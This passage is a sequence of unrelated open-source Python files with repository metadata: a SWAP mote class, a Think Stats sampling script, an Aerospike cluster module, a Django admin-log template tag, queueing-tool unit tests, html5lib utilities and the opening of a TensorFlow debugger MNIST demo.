data["name"] = self.definition.product
data["address"] = self.address
regs = []
try:
for reg in self.regular_registers:
regs.append(reg.dumps(include_units))
except SwapException:
raise
data["registers"] = regs
return data
def __init__(self, server=None, product_code=None, address=0xFF, security=0, nonce=0):
"""
Class constructor
@param server: SWAP server object
@param product_code: Product Code
@param address: Mote address
"""
if server is None:
raise SwapException("SwapMote constructor needs a valid SwapServer object")
## Swap server object
self.server = server
## Product code
self.product_code = product_code
## Product ID
self.product_id = 0
## Manufacturer ID
self.manufacturer_id = 0
## Definition settings
self.config = None
# Get manufacturer and product id from product code
"""
if product_code is not None:
for i in range(4):
self.manufacturer_id = self.manufacturer_id | (product_code[i] << 8 * (3-i))
self.product_id = self.product_id | (product_code[i + 4] << 8 * (3-i))
"""
try:
self.manufacturer_id = long(product_code[0:8], 16)
self.product_id = long(product_code[8:], 16)
except:
raise SwapException("Incorrect product code received")
# Definition file
## Definition settings
try:
self.definition = XmlDevice(self)
except:
raise
## Device address
self.address = address
## Security option
self.security = security
## Current mote's security nonce
self.nonce = nonce
## State of the mote
self.state = SwapState.RXOFF
## List of regular registers provided by this mote
self.regular_registers = None
## List of config registers provided by this mote
self.config_registers = None
if self.definition is not None:
# List of regular registers
self.regular_registers = self.definition.getRegList()
# List of config registers
self.config_registers = self.definition.getRegList(config=True)
## Time stamp of the last update received from mote
self.timestamp = time.time()
## Powerdown mode
self.pwrdownmode = self.definition.pwrdownmode
## Interval between periodic transmissions
self.txinterval = self.definition.txinterval
|
gpl-2.0
|
myuuuuun/ThinkStats2-Notebook
|
code/mystery.py
|
68
|
1578
|
"""This file contains code used in "Think Stats",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function
import random
import numpy as np
import scipy.stats
def write_sample(sample, filename):
"""Write a sequence of floats to a file.
"""
fp = open(filename, 'w')
for x in sample:
fp.write('%f\n' % x)
fp.close()
def uniform_sample(n):
return [random.uniform(0, 100) for i in range(n)]
def triangular_sample(n):
return [random.triangular(0, 100) for i in range(n)]
def expo_sample(n):
return [random.expovariate(1.0/50) for i in range(n)]
def gauss_sample(n):
return [random.gauss(50, 25) for i in range(n)]
def lognorm_sample(n):
return [random.lognormvariate(3, 1.3) for i in range(n)]
def pareto_sample(n):
return [10 * random.paretovariate(1.2) for i in range(n)]
def weibull_sample(n):
return [random.weibullvariate(60, 5) for i in range(n)]
def gumbel_sample(n):
rv = scipy.stats.gumbel_r(45, 10)
return rv.rvs(n)
def main():
funcs = [uniform_sample, triangular_sample, expo_sample,
gauss_sample, lognorm_sample, pareto_sample,
weibull_sample, gumbel_sample]
for i in range(len(funcs)):
sample = funcs[i](1000)
print(np.mean(sample))
filename = 'mystery%d.dat' % i
write_sample(sample, filename)
if __name__ == '__main__':
main()
|
gpl-2.0
|
PavanGupta01/aerospike-admin
|
lib/cluster.py
|
1
|
9431
|
# Copyright 2013-2014 Aerospike, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from lib import citrusleaf
from lib import util
from lib.node import Node
from lib.prefixdict import PrefixDict
import re
class Cluster(object):
# Kinda like a singleton... All instantiated classes will share the same
# state... This makes the class no
cluster_state = {}
def __init__(self, seed_nodes, use_telnet=False, user=None, password=None):
"""
Want to be able to support multiple nodes on one box (for testing)
seed_nodes should be the form (address,port) address can be fqdn or ip.
"""
self.__dict__ = self.cluster_state
if self.cluster_state != {}:
return
# will we connect using telnet port?
self.use_telnet = use_telnet
self.user = user
self.password = password
# self.nodes is a dict from Node ID -> Node objects
self.nodes = {}
# self.node_lookup is a dict of (fqdn, port) -> Node
# and (ip, port) -> Node, and node.node_id -> Node
self.node_lookup = PrefixDict()
self._original_seed_nodes = set(seed_nodes)
self._seed_nodes = set(seed_nodes)
self._live_nodes = set()
# crawl the cluster search for nodes in addition to the seed nodes.
self._enable_crawler = True
self._crawl()
def __str__(self):
nodes = self.nodes.values()
online = [n.key for n in filter(lambda n: n.alive, nodes)]
offline = [n.key for n in filter(lambda n: not n.alive, nodes)]
retval = "Found %s nodes"%(len(nodes))
if online:
retval += "\nOnline: %s"%(", ".join(online))
if offline:
retval += "\nOffline: %s"%(", ".join(offline))
return retval
def getPrefixes(self):
prefixes = {}
for node_key, node in self.nodes.iteritems():
fqdn = node.sockName(use_fqdn=True)
prefixes[node_key] = self.node_lookup.getPrefix(fqdn)
return prefixes
def getExpectedPrincipal(self):
try:
return max([n.node_id for n in self.nodes.itervalues()])
except:
return ''
def getVisibility(self):
return self._live_nodes
def _shouldCrawl(self):
"""
Determine if we need to do a crawl.
We crawl if the union of all services lists is not equal to the set
of nodes that this tool percieves as alive.
"""
if not self._enable_crawler:
return False
self._enable_crawler = False
current_services = set()
self._refreshNodeLiveliness()
try:
infoservices = self.infoServices().values()
for s in self.infoServices().values():
if isinstance(s, Exception):
continue
current_services |= set(s)
if current_services and current_services == self._live_nodes:
# services have not changed, do not crawl
# if services are empty they crawl regardless
return False
else:
# services have changed
return True
except IOError:
# We aren't connected yet, definently crawl.
return True
finally:
# Re-enable crawler before exiting
self._enable_crawler = True
def _crawl(self):
"""
Find all the nodes in the cluster and add them to self.nodes.
"""
if not self._shouldCrawl():
return
self._enable_crawler = False
try:
if self._seed_nodes:
seed_nodes = self._seed_nodes
else:
seed_nodes = self._original_seed_nodes
# clear the current lookup and node list
all_services = set()
visited = set()
unvisited = set(seed_nodes)
while unvisited - visited:
l_unvisited = list(unvisited)
nodes = util.concurrent_map(self._registerNode, l_unvisited)
live_nodes = filter(
lambda n: n is not None and n.alive and n not in visited
, nodes)
visited |= unvisited
unvisited.clear()
services_list = util.concurrent_map(self._getServices, live_nodes)
for node, services in zip(live_nodes, services_list):
if isinstance(services, Exception):
continue
all_services.update(set(services))
all_services.add((node.ip, node.port))
unvisited = all_services - visited
if all_services:
self._seed_nodes = all_services
self._refreshNodeLiveliness()
except:
pass
finally:
self._enable_crawler = True
def _refreshNodeLiveliness(self):
live_nodes = filter(lambda n: n.alive, self.nodes.itervalues())
self._live_nodes.clear()
self._live_nodes.update(map(lambda n: (n.ip, n.port), live_nodes))
def updateNode(self, node):
self.nodes[node.key] = node
# add node to lookup
self.node_lookup[node.sockName(use_fqdn = True)] = node
self.node_lookup[node.sockName()] = node
if node.alive:
self.node_lookup[node.node_id] = node
def getNode(self, node):
return self.node_lookup[node]
def _registerNode(self, ip_port):
"""
Instantiate and return a new node
If cannot instantiate node, return None.
Creates a new node if:
1) node.key doesn't already exist
2) node.key exists but existing node is not alive
"""
try:
ip, port = ip_port
except Exception as e:
print "ip_port is expected to be a tuple of len 2, " + \
"instead it is of type %s and str value of %s"%(type(ip_port)
, str(ip_port))
return None
try:
node_key = Node.createKey(ip, port)
if node_key in self.nodes:
existing = self.nodes[node_key]
else:
existing = None
if not existing or not existing.alive:
new_node = Node(ip
, port
, use_telnet=self.use_telnet
, user=self.user
, password=self.password)
if existing and not new_node.alive:
new_node = existing
self.updateNode(new_node)
return new_node
except:
return None
def _getServices(self, node):
"""
Given a node object return its services list
"""
services = node.infoServicesAlumni()
if services:
return services
return node.infoServices() # compatible for version without alumni
def _callNodeMethod(self, nodes, method_name, *args, **kwargs):
"""
Run a particular method command across a set of nodes
nodes is a list of nodes to to run the command against.
if nodes is None then we run on all nodes.
"""
self._crawl()
if nodes == 'all':
use_nodes = self.nodes.values()
elif type(nodes) == list:
use_nodes = []
for n in nodes:
try:
node_list = self.getNode(n)
if isinstance(node_list, list):
use_nodes.extend(self.getNode(n))
else:
use_nodes.append(self.getNode(n))
except: # Ignore ambiguous and key errors
continue
else:
raise TypeError(
"nodes should be 'all' or list found %s"%type(nodes))
if len(use_nodes) == 0:
raise IOError('Unable to find any Aerospike nodes')
return dict(
util.concurrent_map(
lambda node:
(node.key, getattr(node, method_name)(*args, **kwargs)),
use_nodes))
def isXDREnabled(self, nodes = 'all'):
return self._callNodeMethod(nodes, 'isXDREnabled')
def __getattr__(self, name):
regex = re.compile("^info.*$|^xdr.*$")
if regex.match(name):
def infoFunc(*args, **kwargs):
if 'nodes' not in kwargs:
nodes = 'all'
else:
nodes = kwargs['nodes']
del(kwargs['nodes'])
return self._callNodeMethod(nodes, name, *args, **kwargs)
return infoFunc
else:
raise AttributeError("Cluster has not attribute '%s'"%(name))
|
apache-2.0
|
ridfrustum/lettuce
|
tests/integration/lib/Django-1.2.5/django/contrib/admin/templatetags/log.py
|
310
|
2270
|
from django import template
from django.contrib.admin.models import LogEntry
register = template.Library()
class AdminLogNode(template.Node):
def __init__(self, limit, varname, user):
self.limit, self.varname, self.user = limit, varname, user
def __repr__(self):
return "<GetAdminLog Node>"
def render(self, context):
if self.user is None:
context[self.varname] = LogEntry.objects.all().select_related('content_type', 'user')[:self.limit]
else:
user_id = self.user
if not user_id.isdigit():
user_id = context[self.user].id
context[self.varname] = LogEntry.objects.filter(user__id__exact=user_id).select_related('content_type', 'user')[:self.limit]
return ''
class DoGetAdminLog:
"""
Populates a template variable with the admin log for the given criteria.
Usage::
{% get_admin_log [limit] as [varname] for_user [context_var_containing_user_obj] %}
Examples::
{% get_admin_log 10 as admin_log for_user 23 %}
{% get_admin_log 10 as admin_log for_user user %}
{% get_admin_log 10 as admin_log %}
Note that ``context_var_containing_user_obj`` can be a hard-coded integer
(user ID) or the name of a template context variable containing the user
object whose ID you want.
"""
def __init__(self, tag_name):
self.tag_name = tag_name
def __call__(self, parser, token):
tokens = token.contents.split()
if len(tokens) < 4:
raise template.TemplateSyntaxError("'%s' statements require two arguments" % self.tag_name)
if not tokens[1].isdigit():
raise template.TemplateSyntaxError("First argument in '%s' must be an integer" % self.tag_name)
if tokens[2] != 'as':
raise template.TemplateSyntaxError("Second argument in '%s' must be 'as'" % self.tag_name)
if len(tokens) > 4:
if tokens[4] != 'for_user':
raise template.TemplateSyntaxError("Fourth argument in '%s' must be 'for_user'" % self.tag_name)
return AdminLogNode(limit=tokens[1], varname=tokens[3], user=(len(tokens) > 5 and tokens[5] or None))
register.tag('get_admin_log', DoGetAdminLog('get_admin_log'))
|
gpl-3.0
|
djordon/queueing-tool
|
tests/test_network.py
|
1
|
18249
|
import os
import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
try:
import matplotlib.pyplot as plt
HAS_MATPLOTLIB = True
except ImportError:
HAS_MATPLOTLIB = False
import networkx as nx
import numpy as np
import queueing_tool as qt
TRAVIS_TEST = os.environ.get('TRAVIS_TEST', False)
class TestQueueNetwork(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.g = qt.generate_pagerank_graph(200)
cls.qn = qt.QueueNetwork(cls.g)
cls.qn.g.draw_graph = mock.MagicMock()
cls.qn.max_agents = 2000
cls.qn.initialize(50)
def tearDown(self):
self.qn.clear()
self.qn.initialize(50)
def test_QueueNetwork_accounting(self):
num_events = 2500
ans = np.zeros(num_events, bool)
na = np.zeros(self.qn.nE, int)
for q in self.qn.edge2queue:
na[q.edge[2]] = len(q._arrivals) + len(q._departures) + len(q.queue) - 2
for k in range(num_events):
ans[k] = (self.qn.num_agents == na).all()
self.qn.simulate(n=1)
for q in self.qn.edge2queue:
na[q.edge[2]] = len(q._arrivals) + len(q._departures) + len(q.queue) - 2
self.assertTrue(ans.all())
def test_QueueNetwork_add_arrival(self):
adj = {0: [1], 1: [2, 3]}
g = qt.adjacency2graph(adj)
qn = qt.QueueNetwork(g)
mat = qt.generate_transition_matrix(g)
qn.set_transitions(mat)
qn.initialize(edges=(0, 1))
qn.start_collecting_data(edge=[(1, 2), (1, 3)])
qn.simulate(150000)
data = qn.get_queue_data(edge=[(1, 2), (1, 3)])
e0, e1 = qn.out_edges[1]
p0 = np.sum(data[:, 5] == e0, dtype=float) / data.shape[0]
p1 = np.sum(data[:, 5] == e1, dtype=float) / data.shape[0]
trans = qn.transitions(False)
self.assertAlmostEqual(trans[1][2], p0, 2)
self.assertAlmostEqual(trans[1][3], p1, 2)
def test_QueueNetwork_animate(self):
if not HAS_MATPLOTLIB:
with mock.patch('queueing_tool.network.queue_network.plt.show'):
self.qn.animate(frames=5)
else:
plt.switch_backend('Agg')
self.qn.animate(frames=5)
def test_QueueNetwork_blocking(self):
g = nx.random_geometric_graph(100, 0.2).to_directed()
g = qt.set_types_random(g, proportions={k: 1.0 / 6 for k in range(1, 7)})
q_cls = {
1: qt.LossQueue,
2: qt.QueueServer,
3: qt.InfoQueue,
4: qt.ResourceQueue,
5: qt.ResourceQueue,
6: qt.QueueServer
}
q_arg = {
3: {'net_size': g.number_of_edges()},
4: {'num_servers': 500},
6: {'AgentFactory': qt.GreedyAgent}
}
qn = qt.QueueNetwork(g, q_classes=q_cls, q_args=q_arg, seed=17)
qn.blocking = 'RS'
self.assertEqual(qn.blocking, 'RS')
self.assertEqual(qn._blocking, False)
qn.clear()
self.assertEqual(qn._initialized, False)
def test_QueueNetwork_blocking_setter_error(self):
self.qn.blocking = 'RS'
with self.assertRaises(TypeError):
self.qn.blocking = 2
def test_QueueNetwork_closedness(self):
num_events = 2500
ans = np.zeros(num_events, bool)
na = np.zeros(self.qn.nE, int)
for q in self.qn.edge2queue:
na[q.edge[2]] = len(q._arrivals) + len(q._departures) + len(q.queue) - 2
for k in range(num_events):
ans[k] = np.sum(self.qn.num_agents) >= np.sum(na)
for q in self.qn.edge2queue:
na[q.edge[2]] = len(q._arrivals) + len(q._departures) + len(q.queue) - 2
self.qn.simulate(n=1)
self.assertTrue(ans.all())
def test_QueueNetwork_copy(self):
g = nx.random_geometric_graph(100, 0.2).to_directed()
g = qt.set_types_random(g, proportions={k: 0.2 for k in range(1, 6)})
q_cls = {
1: qt.LossQueue,
2: qt.QueueServer,
3: qt.InfoQueue,
4: qt.ResourceQueue,
5: qt.ResourceQueue
}
q_arg = {3: {'net_size': g.number_of_edges()},
4: {'num_servers': 500}}
qn = qt.QueueNetwork(g, q_classes=q_cls, q_args=q_arg, seed=17)
qn.max_agents = np.infty
qn.initialize(queues=range(g.number_of_edges()))
qn.simulate(n=50000)
qn2 = qn.copy()
stamp = [(q.num_arrivals, q.time) for q in qn2.edge2queue]
qn2.simulate(n=25000)
self.assertFalse(qn.current_time == qn2.current_time)
self.assertFalse(qn.time == qn2.time)
ans = []
for k, q in enumerate(qn2.edge2queue):
if stamp[k][1] != q.time:
ans.append(q.time != qn.edge2queue[k].time)
self.assertTrue(np.array(ans).all())
@mock.patch('queueing_tool.network.queue_network.HAS_MATPLOTLIB', True)
def test_QueueNetwork_drawing(self):
scatter_kwargs = {'c': 'b'}
kwargs = {'bgcolor': 'green'}
self.qn.draw(scatter_kwargs=scatter_kwargs, **kwargs)
self.qn.g.draw_graph.assert_called_with(scatter_kwargs=scatter_kwargs,
line_kwargs=None, **kwargs)
self.qn.draw(scatter_kwargs=scatter_kwargs)
bgcolor = self.qn.colors['bgcolor']
self.qn.g.draw_graph.assert_called_with(scatter_kwargs=scatter_kwargs,
line_kwargs=None, bgcolor=bgcolor)
@mock.patch('queueing_tool.network.queue_network.HAS_MATPLOTLIB', False)
def test_QueueNetwork_drawing_importerror(self):
with self.assertRaises(ImportError):
self.qn.draw()
def test_QueueNetwork_drawing_animation_error(self):
self.qn.clear()
with self.assertRaises(qt.QueueingToolError):
self.qn.animate()
self.qn.initialize()
with mock.patch('queueing_tool.network.queue_network.HAS_MATPLOTLIB', False):
with self.assertRaises(ImportError):
self.qn.animate()
def test_QueueNetwork_init_error(self):
g = qt.generate_pagerank_graph(7)
with self.assertRaises(TypeError):
qt.QueueNetwork(g, blocking=2)
def test_QueueNetwork_get_agent_data(self):
self.qn.clear()
self.qn.initialize(queues=1)
self.qn.start_collecting_data()
self.qn.simulate(n=20000)
data = self.qn.get_agent_data()
dat0 = data[(1, 0)]
a = dat0[:, 0]
b = dat0[dat0[:, 1] > 0, 1]
c = dat0[dat0[:, 2] > 0, 2]
a.sort()
b.sort()
c.sort()
self.assertTrue((a == dat0[:, 0]).all())
self.assertTrue((b == dat0[dat0[:, 1] > 0, 1]).all())
self.assertTrue((c == dat0[dat0[:, 2] > 0, 2]).all())
self.assertTrue((dat0[1:, 0] == dat0[dat0[:, 2] > 0, 2]).all())
def test_QueueNetwork_get_queue_data(self):
g = nx.random_geometric_graph(50, 0.5).to_directed()
q_cls = {1: qt.QueueServer}
qn = qt.QueueNetwork(g, q_classes=q_cls, seed=17)
k = np.random.randint(10000, 20000)
qn.max_agents = 4000
qn.initialize(queues=range(qn.nE))
qn.start_collecting_data()
qn.simulate(n=k)
data = qn.get_queue_data()
self.assertEqual(data.shape, (k, 6))
qn.stop_collecting_data()
qn.clear_data()
ans = np.array([q.data == {} for q in qn.edge2queue])
self.assertTrue(ans.all())
def test_QueueNetwork_greedy_routing(self):
lam = np.random.randint(1, 10) + 0.0
rho = np.random.uniform(0.75, 1)
nSe = np.random.randint(1, 10)
mu = lam / (3 * rho * nSe)
def arr(t):
return t + np.random.exponential(1 / lam)
def ser(t):
return t + np.random.exponential(1 / mu)
def ser_id(t):
return t
adj = {
0: {1: {'edge_type': 1}},
1: {
2: {'edge_type': 2},
3: {'edge_type': 2},
4: {'edge_type': 2}
}
}
g = qt.adjacency2graph(adj)
qcl = {1: qt.QueueServer, 2: qt.QueueServer}
arg = {
1: {
'arrival_f': arr,
'service_f': ser_id,
'AgentFactory': qt.GreedyAgent
},
2: {
'service_f': ser,
'num_servers': nSe
}
}
qn = qt.QueueNetwork(g, q_classes=qcl, q_args=arg)
qn.initialize(edges=(0, 1))
qn.max_agents = 5000
num_events = 1000
ans = np.zeros(num_events, bool)
e01 = qn.g.edge_index[(0, 1)]
edg = qn.edge2queue[e01].edge
c = 0
while c < num_events:
qn.simulate(n=1)
if qn.next_event_description() == ('Departure', e01):
d0 = qn.edge2queue[e01]._departures[0].desired_destination(qn, edg)
a1 = np.argmin([qn.edge2queue[e].number_queued() for e in qn.out_edges[1]])
d1 = qn.out_edges[1][a1]
ans[c] = d0 == d1
c += 1
self.assertTrue(ans.all())
def test_QueueNetwork_initialize_Error(self):
self.qn.clear()
with self.assertRaises(ValueError):
self.qn.initialize(nActive=0)
with self.assertRaises(TypeError):
self.qn.initialize(nActive=1.6)
_get_queues_mock = mock.Mock()
_get_queues_mock.return_value = []
mock_location = 'queueing_tool.network.queue_network._get_queues'
with mock.patch(mock_location, _get_queues_mock):
with self.assertRaises(qt.QueueingToolError):
self.qn.initialize(edge_type=1)
def test_QueueNetwork_initialization(self):
# Single edge index
k = np.random.randint(0, self.qn.nE)
self.qn.clear()
self.qn.initialize(queues=k)
ans = [q.edge[2] for q in self.qn.edge2queue if q.active]
self.assertEqual(ans, [k])
# Multiple edge indices
k = np.unique(np.random.randint(0, self.qn.nE, 5))
self.qn.clear()
self.qn.initialize(queues=k)
ans = np.array([q.edge[2] for q in self.qn.edge2queue if q.active])
ans.sort()
self.assertTrue((ans == k).all())
# Single edge as edge
k = np.random.randint(0, self.qn.nE)
e = self.qn.edge2queue[k].edge[:2]
self.qn.clear()
self.qn.initialize(edges=e)
ans = [q.edge[2] for q in self.qn.edge2queue if q.active]
self.assertEqual(ans, [k])
# Single edge as tuple
k = np.random.randint(0, self.qn.nE)
e = self.qn.edge2queue[k].edge[:2]
self.qn.clear()
self.qn.initialize(edges=e)
ans = [q.edge[2] for q in self.qn.edge2queue if q.active]
self.assertEqual(ans, [k])
# Multiple edges as tuples
k = np.unique(np.random.randint(0, self.qn.nE, 5))
es = [self.qn.edge2queue[i].edge[:2] for i in k]
self.qn.clear()
self.qn.initialize(edges=es)
ans = [q.edge[2] for q in self.qn.edge2queue if q.active]
self.assertTrue((ans == k).all())
# Multple edges as edges
k = np.unique(np.random.randint(0, self.qn.nE, 5))
es = [self.qn.edge2queue[i].edge[:2] for i in k]
self.qn.clear()
self.qn.initialize(edges=es)
ans = [q.edge[2] for q in self.qn.edge2queue if q.active]
self.assertTrue((ans == k).all())
# Single edge_type
k = np.random.randint(1, 4)
self.qn.clear()
self.qn.initialize(edge_type=k)
ans = np.array([q.edge[3] == k for q in self.qn.edge2queue if q.active])
self.assertTrue(ans.all())
# Multiple edge_types
k = np.unique(np.random.randint(1, 4, 3))
self.qn.clear()
self.qn.initialize(edge_type=k)
ans = np.array([q.edge[3] in k for q in self.qn.edge2queue if q.active])
self.assertTrue(ans.all())
self.qn.clear()
self.qn.max_agents = 3
self.qn.initialize(nActive=self.qn.num_edges)
ans = np.array([q.active for q in self.qn.edge2queue])
self.assertEqual(ans.sum(), 3)
def test_QueueNetwork_max_agents(self):
num_events = 1500
self.qn.max_agents = 200
ans = np.zeros(num_events, bool)
for k in range(num_events // 2):
ans[k] = np.sum(self.qn.num_agents) <= self.qn.max_agents
self.qn.simulate(n=1)
self.qn.simulate(n=20000)
for k in range(num_events // 2, num_events):
ans[k] = np.sum(self.qn.num_agents) <= self.qn.max_agents
self.qn.simulate(n=1)
self.assertTrue(ans.all())
def test_QueueNetwork_properties(self):
self.qn.clear()
self.assertEqual(self.qn.time, np.infty)
self.assertEqual(self.qn.num_edges, self.qn.nE)
self.assertEqual(self.qn.num_vertices, self.qn.nV)
self.assertEqual(self.qn.num_nodes, self.qn.nV)
def test_QueueNetwork_set_transitions_Error(self):
with self.assertRaises(ValueError):
self.qn.set_transitions({-1: {0: 0.75, 1: 0.25}})
with self.assertRaises(ValueError):
self.qn.set_transitions({self.qn.nV: {0: 0.75, 1: 0.25}})
with self.assertRaises(ValueError):
self.qn.set_transitions({0: {0: 0.75, 1: -0.25}})
with self.assertRaises(ValueError):
self.qn.set_transitions({0: {0: 1.25, 1: -0.25}})
mat = np.zeros((2, 2))
with self.assertRaises(ValueError):
self.qn.set_transitions(mat)
mat = np.zeros((self.qn.nV, self.qn.nV))
with self.assertRaises(ValueError):
self.qn.set_transitions(mat)
mat[0, 0] = -1
mat[0, 1] = 2
with self.assertRaises(ValueError):
self.qn.set_transitions(mat)
mat = 1
with self.assertRaises(TypeError):
self.qn.set_transitions(mat)
def test_QueueNetwork_simulate(self):
g = qt.generate_pagerank_graph(50)
qn = qt.QueueNetwork(g)
qn.max_agents = 2000
qn.initialize(50)
t0 = np.random.uniform(30, 50)
qn.max_agents = 2000
qn.simulate(t=t0)
self.assertGreater(qn.current_time, t0)
def test_QueueNetwork_simulate_error(self):
self.qn.clear()
with self.assertRaises(qt.QueueingToolError):
self.qn.simulate()
def test_QueueNetwork_simulate_slow(self):
e = self.qn._fancy_heap.array_edges[0]
edge = self.qn.edge2queue[e].edge
if edge[0] == edge[1]:
for q in self.qn.edge2queue:
if q.edge[0] != q.edge[1]:
break
self.qn._simulate_next_event(slow=True)
else:
for q in self.qn.edge2queue:
if q.edge[0] == q.edge[1]:
break
self.qn._simulate_next_event(slow=True)
self.qn.clear()
self.qn.initialize(queues=[q.edge[2]])
e = self.qn._fancy_heap.array_edges[0]
edge = self.qn.edge2queue[e].edge
loop = edge[0] == edge[1]
self.qn._simulate_next_event(slow=True)
while True:
e = self.qn._fancy_heap.array_edges[0]
edge = self.qn.edge2queue[e].edge
if (edge[0] != edge[1]) == loop:
self.qn._simulate_next_event(slow=True)
break
else:
self.qn._simulate_next_event(slow=False)
@mock.patch('queueing_tool.network.queue_network.HAS_MATPLOTLIB', True)
def test_QueueNetwork_show_type(self):
args = {'c': 'b', 'bgcolor': 'green'}
self.qn.show_type(edge_type=2, **args)
self.qn.g.draw_graph.assert_called_with(scatter_kwargs=None,
line_kwargs=None, **args)
@mock.patch('queueing_tool.network.queue_network.HAS_MATPLOTLIB', True)
def test_QueueNetwork_show_active(self):
args = {
'fname': 'types.png',
'figsize': (3, 3),
'bgcolor': 'green'
}
self.qn.show_active(**args)
self.qn.g.draw_graph.assert_called_with(scatter_kwargs=None,
line_kwargs=None, **args)
def test_QueueNetwork_sorting(self):
num_events = 2000
ans = np.zeros(num_events, bool)
for k in range(num_events // 2):
queue_times = [q.time for q in self.qn.edge2queue]
queue_times.sort()
tmp = queue_times[0]
self.qn.simulate(n=1)
ans[k] = (tmp == self.qn._qkey[0])
self.qn.simulate(n=10000)
for k in range(num_events // 2, num_events):
queue_times = [q.time for q in self.qn.edge2queue]
queue_times.sort()
tmp = queue_times[0]
self.qn.simulate(n=1)
ans[k] = (tmp == self.qn._qkey[0])
self.assertTrue(ans.all())
def test_QueueNetwork_transitions(self):
degree = [len(self.qn.out_edges[k]) for k in range(self.qn.nV)]
v, deg = np.argmax(degree), max(degree)
out_edges = sorted(self.qn.g.out_edges(v))
trans = np.random.uniform(size=deg)
trans = trans / sum(trans)
probs = {v: {e[1]: p for e, p in zip(out_edges, trans)}}
self.qn.set_transitions(probs)
mat = self.qn.transitions()
tra = mat[v, [e[1] for e in out_edges]]
self.assertTrue((tra == trans).all())
tra = self.qn.transitions(return_matrix=False)
tra = np.array([tra[v][e[1]] for e in out_edges])
self.assertTrue((tra == trans).all())
mat = qt.generate_transition_matrix(self.g)
self.qn.set_transitions(mat)
tra = self.qn.transitions()
self.assertTrue(np.allclose(tra, mat))
mat = qt.generate_transition_matrix(self.g)
self.qn.set_transitions({v: {e[1]: mat[e] for e in out_edges}})
tra = self.qn.transitions()
self.assertTrue(np.allclose(tra[v], mat[v]))
|
mit
|
devs1991/test_edx_docmode
|
venv/lib/python2.7/site-packages/pip/_vendor/html5lib/utils.py
|
436
|
3267
|
from __future__ import absolute_import, division, unicode_literals
from types import ModuleType
from pip._vendor.six import text_type
try:
import xml.etree.cElementTree as default_etree
except ImportError:
import xml.etree.ElementTree as default_etree
__all__ = ["default_etree", "MethodDispatcher", "isSurrogatePair",
"surrogatePairToCodepoint", "moduleFactoryFactory",
"supports_lone_surrogates"]
# Platforms not supporting lone surrogates (\uD800-\uDFFF) should be
# caught by the below test. In general this would be any platform
# using UTF-16 as its encoding of unicode strings, such as
# Jython. This is because UTF-16 itself is based on the use of such
# surrogates, and there is no mechanism to further escape such
# escapes.
try:
_x = eval('"\\uD800"')
if not isinstance(_x, text_type):
# We need this with u"" because of http://bugs.jython.org/issue2039
_x = eval('u"\\uD800"')
assert isinstance(_x, text_type)
except:
supports_lone_surrogates = False
else:
supports_lone_surrogates = True
class MethodDispatcher(dict):
"""Dict with 2 special properties:
On initiation, keys that are lists, sets or tuples are converted to
multiple keys so accessing any one of the items in the original
list-like object returns the matching value
md = MethodDispatcher({("foo", "bar"):"baz"})
md["foo"] == "baz"
A default value which can be set through the default attribute.
"""
def __init__(self, items=()):
# Using _dictEntries instead of directly assigning to self is about
# twice as fast. Please do careful performance testing before changing
# anything here.
_dictEntries = []
for name, value in items:
if type(name) in (list, tuple, frozenset, set):
for item in name:
_dictEntries.append((item, value))
else:
_dictEntries.append((name, value))
dict.__init__(self, _dictEntries)
self.default = None
def __getitem__(self, key):
return dict.get(self, key, self.default)
# Some utility functions to dal with weirdness around UCS2 vs UCS4
# python builds
def isSurrogatePair(data):
return (len(data) == 2 and
ord(data[0]) >= 0xD800 and ord(data[0]) <= 0xDBFF and
ord(data[1]) >= 0xDC00 and ord(data[1]) <= 0xDFFF)
def surrogatePairToCodepoint(data):
char_val = (0x10000 + (ord(data[0]) - 0xD800) * 0x400 +
(ord(data[1]) - 0xDC00))
return char_val
# Module Factory Factory (no, this isn't Java, I know)
# Here to stop this being duplicated all over the place.
def moduleFactoryFactory(factory):
moduleCache = {}
def moduleFactory(baseModule, *args, **kwargs):
if isinstance(ModuleType.__name__, type("")):
name = "_%s_factory" % baseModule.__name__
else:
name = b"_%s_factory" % baseModule.__name__
if name in moduleCache:
return moduleCache[name]
else:
mod = ModuleType(name)
objs = factory(baseModule, *args, **kwargs)
mod.__dict__.update(objs)
moduleCache[name] = mod
return mod
return moduleFactory
|
agpl-3.0
|
gunan/tensorflow
|
tensorflow/python/debug/examples/v2/debug_mnist_v2.py
|
4
|
7614
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Demo of the tfdbg curses CLI: Locating the source of bad numerical values with TF v2.
This demo contains a classical example of a neural network for the mnist
dataset, but modifications are made so that problematic numerical values (infs
and nans) appear in nodes of the graph during training.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
import absl
import tensorflow.compat.v2 as tf
IMAGE_SIZE = 28
HIDDEN_SIZE = 500
NUM_LABELS = 10
# If we set the weights randomly, the model will converge normally about half
# the time. We need a seed to ensure that the bad numerical values issue
# appears.
RAND_SEED = 42
tf.compat.v1.enable_v2_behavior()
FLAGS = None
def parse_args():
"""Parses commandline arguments.
Returns:
A tuple (parsed, unparsed) of the parsed object and a group of unparsed
arguments that did not match the parser.
"""
parser = argparse.ArgumentParser()
parser.register("type", "bool", lambda v: v.lower() == "true")
parser.add_argument(
"--max_steps",
type=int,
default=10,
help="Number of steps to run trainer.")
parser.add_argument(
"--train_batch_size",
type=int,
default=100,
help="Batch size used during training.")
parser.add_argument(
"--learning_rate",
type=float,
default=0.025,
help="Initial learning rate.")
parser.add_argument(
"--data_dir",
type=str,
default="/tmp/mnist_data",
help="Directory for storing data")
parser.add_argument(
"--fake_data",
type="bool",
